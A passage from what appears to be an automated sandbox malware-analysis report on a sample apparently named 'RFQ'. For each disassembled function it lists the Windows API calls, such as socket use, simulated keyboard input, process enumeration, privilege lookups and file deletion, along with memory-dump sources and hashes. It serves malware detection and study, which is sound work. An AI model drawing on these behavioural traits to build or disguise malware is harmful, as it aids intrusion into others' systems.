                                                                            Similarity
                                                                            • API ID: Window$ClientMoveRectScreen
                                                                            • String ID:
                                                                            • API String ID: 3880355969-0
                                                                            • Opcode ID: 1c9e28893e495e76a9c00e6c2c704156c50c21b8b941f4f3dbfef53992b45c62
                                                                            • Instruction ID: ad19385c9f8e34e480b53d9b2c1f1364f497693b45cdc65f052bd73d8e6979b2
                                                                            • Opcode Fuzzy Hash: 1c9e28893e495e76a9c00e6c2c704156c50c21b8b941f4f3dbfef53992b45c62
                                                                            • Instruction Fuzzy Hash: 20513B74A00249AFCF15DF98C880AEE7BB6FF54360F108159F9559B290D774EE81CB90
                                                                            Function 007019FD Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00701A24
                                                                            • WSAGetLastError.WSOCK32 ref: 00701A32
                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00701AB1
                                                                            • WSAGetLastError.WSOCK32 ref: 00701ABB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            • Opcode ID: 19377e708d22560e72ce2cb847b9c099e29b3e6506d12d4f3833f573b5d5d36e
                                                                            • Instruction ID: 5f3ff282dd62eecd8b251ba20f98367255521018b62d5f10950348ad71c169ba
                                                                            • Opcode Fuzzy Hash: 19377e708d22560e72ce2cb847b9c099e29b3e6506d12d4f3833f573b5d5d36e
                                                                            • Instruction Fuzzy Hash: 7A41BC74600200AFE720AF64C886F2A37E6AF45718F94C15CF92A9F7D2C676ED41CB94
                                                                            Function 006BB3BF Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 01089f7f2b9f190f0901f8084d4f02b3f935f2074a55612ac686f04488cfaa05
                                                                            • Instruction ID: ffa70ceee5e094239495bc901d4cbbf3cfefb114908751a9d79c7439b2e7c021
                                                                            • Opcode Fuzzy Hash: 01089f7f2b9f190f0901f8084d4f02b3f935f2074a55612ac686f04488cfaa05
                                                                            • Instruction Fuzzy Hash: FA41EAB1600714AFD724AF78C841BEA7BEAEB89710F10553EF151DB282D7B599818B84
                                                                            Function 006F55F7 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006F56A1
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 006F56C7
                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006F56EC
                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006F5718
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            • Opcode ID: a0ea241e2672cc4b1303b7e3b628cae9d465651580eb3b26c9df669afb331391
                                                                            • Instruction ID: 19ef41aca9419a6efdce15934b5d4951003f154e4050a01e22bbd8a5c4810750
                                                                            • Opcode Fuzzy Hash: a0ea241e2672cc4b1303b7e3b628cae9d465651580eb3b26c9df669afb331391
                                                                            • Instruction Fuzzy Hash: C9413D35600610DFCB11EF55C445A5DBBE2FF89720B58C488EA4AAB3A2CB75FD01CB95
                                                                            Function 006BD863 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,006A6D01,00000000,00000000,006A8269,?,006A8269,?,00000001,006A6D01,8BE85006,00000001,006A8269,006A8269), ref: 006BD8B0
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 006BD939
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 006BD94B
                                                                            • __freea.LIBCMT ref: 006BD954
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            • Opcode ID: a9b1811f972dd79117cf37ad7df17a30cb5b4588fb308a807395cad6161c8c19
                                                                            • Instruction ID: 5c767054f54e6c3d1e7b7cf90c460efab2b5a8040b2d1835d911651ce0de3017
                                                                            • Opcode Fuzzy Hash: a9b1811f972dd79117cf37ad7df17a30cb5b4588fb308a807395cad6161c8c19
                                                                            • Instruction Fuzzy Hash: 7231D2B2A0021AABDB259F64CC45EEE7BA6EF41714F04412CFD14DB251EB35DD90CB90
                                                                            Function 007151F6 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00715287
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 007152AA
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007152B7
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007152DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                            • String ID:
                                                                            • API String ID: 3340791633-0
                                                                            • Opcode ID: 31c032bc9a960b786ce206e4c5abfe912c0519ad8ca551bc79267845c69e28ec
                                                                            • Instruction ID: 0b9df4ce3467cc7d1a48dff07b7cc4739a1d98359e185e69c1af7b07afbf377f
                                                                            • Opcode Fuzzy Hash: 31c032bc9a960b786ce206e4c5abfe912c0519ad8ca551bc79267845c69e28ec
                                                                            • Instruction Fuzzy Hash: 8531C476A91A08FFEF399E5CCC46BE83761BB85750F548102F611972E1C37CA9C09B45
                                                                            Function 006EAABA Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006EAB0F
                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 006EAB2B
                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 006EAB92
                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006EABE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                            • String ID:
                                                                            • API String ID: 432972143-0
                                                                            • Opcode ID: 688b63ef2ee4637e5f2ae7d36e986f6b9beec87af3bab645bbd12c235d67f164
                                                                            • Instruction ID: 970599f940ca3f3e0d2de08f90c9058000f53495f1e2cf4688737b3c8bcd876e
                                                                            • Opcode Fuzzy Hash: 688b63ef2ee4637e5f2ae7d36e986f6b9beec87af3bab645bbd12c235d67f164
                                                                            • Instruction Fuzzy Hash: F1315E30941398AEFF318BAACC05BFE7B7BAF44320F04835EE491562D1C378A9568756
                                                                            Function 00717543 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ClientToScreen.USER32(?,?), ref: 00717569
                                                                            • GetWindowRect.USER32(?,?), ref: 007175DF
                                                                            • PtInRect.USER32(?,?,00718A7B), ref: 007175EF
                                                                            • MessageBeep.USER32(00000000), ref: 0071765B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            • Opcode ID: fd74258eef50b6a628de2519bb91275620cd887a4e5d76c3d897685676582977
                                                                            • Instruction ID: 2a40915a2037378f22a0e2939936be113ad86a50680aed165714fb2ed1b4e58c
                                                                            • Opcode Fuzzy Hash: fd74258eef50b6a628de2519bb91275620cd887a4e5d76c3d897685676582977
                                                                            • Instruction Fuzzy Hash: 90418970A08615DFCB09CF9CD884FE9B7F6BB49311F5580A9E8149B2A1C778ED81CB90
                                                                            Function 0071160D Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0071161E
                                                                              • Part of subcall function 006E3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 006E399F
                                                                              • Part of subcall function 006E3985: GetCurrentThreadId.KERNEL32 ref: 006E39A6
                                                                              • Part of subcall function 006E3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006E24F7), ref: 006E39AD
                                                                            • GetCaretPos.USER32(?), ref: 00711632
                                                                            • ClientToScreen.USER32(00000000,?), ref: 0071167F
                                                                            • GetForegroundWindow.USER32 ref: 00711685
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: 7144f0a6c81d9d3341899607ecfe8b4e2e3df4bc73716b3edbc0e33524adc3d7
                                                                            • Instruction ID: ea6353e5d4abd5e227d1721fe606b3560cddd07ed6044e43087739619a33bffe
                                                                            • Opcode Fuzzy Hash: 7144f0a6c81d9d3341899607ecfe8b4e2e3df4bc73716b3edbc0e33524adc3d7
                                                                            • Instruction Fuzzy Hash: 1C317071D00209AFC704EFA9C8818EEBBFDEF89304B54806EE515E7252DB359E45CBA4
                                                                            Function 006ED3FA Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 006ED41F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 006ED42D
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 006ED44D
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006ED4FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 420147892-0
                                                                            • Opcode ID: 5e3b7041493e0bf3eefc82d8f95613179fdf3f84f068cb2418938ae072e6a36d
                                                                            • Instruction ID: e83a8e58b36f7ccde1160e9f29b26dca47d612e79b30f0fdd434de0727ad4684
                                                                            • Opcode Fuzzy Hash: 5e3b7041493e0bf3eefc82d8f95613179fdf3f84f068cb2418938ae072e6a36d
                                                                            • Instruction Fuzzy Hash: CC31D4710083409FC301EF55C885AAFBBF9EF99350F00062DF581862E1EBB0AA49CB96
                                                                            Function 00718EBB Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • GetCursorPos.USER32(?), ref: 00718EF3
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006D80CE,?,?,?,?,?), ref: 00718F08
                                                                            • GetCursorPos.USER32(?), ref: 00718F50
                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006D80CE,?,?,?), ref: 00718F86
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                            • String ID:
                                                                            • API String ID: 2864067406-0
                                                                            • Opcode ID: 0251ab3c7451ad62721ae12d4621c9e77b6f9d87b57aa299f368144f756356a2
                                                                            • Instruction ID: 17487a444296ee5d8c96817aaaf095541f5ce4ae5f8b57a3e486d06d4fd8ff56
                                                                            • Opcode Fuzzy Hash: 0251ab3c7451ad62721ae12d4621c9e77b6f9d87b57aa299f368144f756356a2
                                                                            • Instruction Fuzzy Hash: 9C21F135100008AFDB22CF98C858EFA7BBAEB0A321F048165F902471E1C739AD92DB61
                                                                            Function 006ED1DF Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNEL32(?,0071D034), ref: 006ED219
                                                                            • GetLastError.KERNEL32 ref: 006ED228
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 006ED237
                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0071D034), ref: 006ED294
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 1343cef08da0d7125aa10455724e7cd2758104a8e8bddcbfd1ab91688d959275
                                                                            • Instruction ID: dcdde139952cf61bea70e94689fc9e8afe675e606d61e99087ac9d06d6982a6d
                                                                            • Opcode Fuzzy Hash: 1343cef08da0d7125aa10455724e7cd2758104a8e8bddcbfd1ab91688d959275
                                                                            • Instruction Fuzzy Hash: 0E21917050A3419F8710EF69C88049AB7E5FE59368F108A1DF699C73E1DB70DE46CB46
                                                                            Function 006E14B5 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E0F6E
                                                                              • Part of subcall function 006E0F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F7A
                                                                              • Part of subcall function 006E0F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F89
                                                                              • Part of subcall function 006E0F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F90
                                                                              • Part of subcall function 006E0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0FA6
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E1502
                                                                            • _memcmp.LIBVCRUNTIME ref: 006E1525
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E155B
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E1562
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: c10a72dfd020412f8124be83fa56a212733c881f0df21f593395363053fe2647
                                                                            • Instruction ID: d74e1ab21add6eac1c4b4647618ad349cf19e36c303291e9ef65da07a5122ca1
                                                                            • Opcode Fuzzy Hash: c10a72dfd020412f8124be83fa56a212733c881f0df21f593395363053fe2647
                                                                            • Instruction Fuzzy Hash: D8217CB1E41248AFDB10DFA9C945BEEB7B9EF85300F148059E455AB240E770AA09DB50
                                                                            Function 007126B5 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0071273D
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00712757
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00712765
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00712773
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 367ce2afa7071595cc160e878b32ec8f5ab4ed1396099e34f424abdc63539261
                                                                            • Instruction ID: 9f4f6e714f553fe57833ad0e4a251c75bf190fa2f01b1a49a91df5d94451da74
                                                                            • Opcode Fuzzy Hash: 367ce2afa7071595cc160e878b32ec8f5ab4ed1396099e34f424abdc63539261
                                                                            • Instruction Fuzzy Hash: 4F21D331205510AFE714AB18C844FEA7BA5AF46324F248258F5268B2D3C779FC92CB95
                                                                            Function 006E784B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 006E8CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?), ref: 006E8CE2
                                                                              • Part of subcall function 006E8CD3: lstrcpyW.KERNEL32(00000000,?,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E8D08
                                                                              • Part of subcall function 006E8CD3: lstrcmpiW.KERNEL32(00000000,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?), ref: 006E8D39
                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E7879
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E789F
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E78DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: d5aac7f1be1ddf70eea7213cc1a1bc19786862ff94e4325ade76b093ef5d6244
                                                                            • Instruction ID: babab479ab47b589a04edf0dd11337ccc37e42ff291c9e9f6326ab686d0a1dc1
                                                                            • Opcode Fuzzy Hash: d5aac7f1be1ddf70eea7213cc1a1bc19786862ff94e4325ade76b093ef5d6244
                                                                            • Instruction Fuzzy Hash: 5311033A201385ABCB156F39CC48EBB77AAEF45750B50803AF902C72A0EF319901D7A5
                                                                            Function 00715595 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 007155F0
                                                                            • _wcslen.LIBCMT ref: 00715602
                                                                            • _wcslen.LIBCMT ref: 0071560D
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0071574B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
